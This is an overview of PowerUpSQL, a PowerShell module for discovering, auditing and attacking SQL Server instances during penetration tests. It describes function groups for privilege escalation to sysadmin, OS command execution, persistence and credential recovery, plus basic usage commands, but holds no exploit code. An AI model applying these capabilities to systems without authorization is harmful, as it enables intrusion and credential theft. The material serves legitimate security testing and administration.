The PowerUpSQL module includes functions to support common attack workflows against SQL Server on scale that can be used during internal penetration tests and red team engagements. I’ve also included many functions that could be used by administrators to inventory the SQL Servers on their Active Directory domain.
PowerUpSQL was designed with six objectives in mind:
+ Scalability: Multi-threading is supported on core functions so they can be executed against many SQL Servers quickly.
+ Portability: Default .net libraries are used and there are no dependencies on SQLPS or the SMO libraries. Functions have also been designed so they can be run independently.
+ Flexibility: PowerUpSQL functions support the PowerShell pipeline so they can be used together, and with other scripts.
+ Easy Server Discovery: Discovery functions can be used to blindly identify local, domain, and non-domain SQL Server instances on scale.
+ Easy Server Auditing: The Invoke-SQLAudit function can be used to audit for common high impact vulnerabilities and weak configurations using the current login’s privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information.
+ Easy Server Exploitation: The Invoke-SQLEscalatePriv function attempts to obtain sysadmin privileges using identified vulnerabilities.With Function:
– Discovery Functions
These functions can be used for enumerating SQL Server instances. Discovered instances can then be piped into other PowerUpSQL functions.
– Primary Attack Functions
These are the functions used to quickly dump databse information, audit for common vulnerabilities, and attempt to obtain sysadmin privileges
– Core Functions
These functions are used to test connections, execute SQL Server queries, and execute OS commands. All other functions use these core functions. However, they can also be executed independently.
– Common Functions
These functions are used for common information gathering tasks. Similar to core functions, the common functions can be executed as standalone functions, but are also used other functions in the PowerUpSQL module
– Audit Functions
These functions are used for identifying weak configurations that can lead to unauthorized access. Invoke-SQLAudit can be used to run all of them at once.
– Persistence Functions
These functions are used for maintaining access to the SQL Server using various methods. The roadmap for development is below. I’ve included a few links to standalone scripts that have not been integrated yet.
– Password Recovery Functions
These functions are used for recovering authentication tokens of varous types. The roadmap for development is below. I’ve included a few links to standalone scripts that have not been integrated yet
– Utility Functions
These are essentially helper functions. Some of them are used by other PowerUpSQL functions, but all of them can be run independently.
– Third Party Functions
A few PowerUpSQL functions use the third party functions below.
To use the module, type Import-Module PowerUpSQL.psd1
To list functions from the module, type Get-Command -Module PowerUpSQL
To list help for a function, type Get-Help FunctionName
To run as an alternative domain user, use the runas command to launch PowerShell first. Example: runas /noprofile /netonly /user:domain\user PowerShell.exe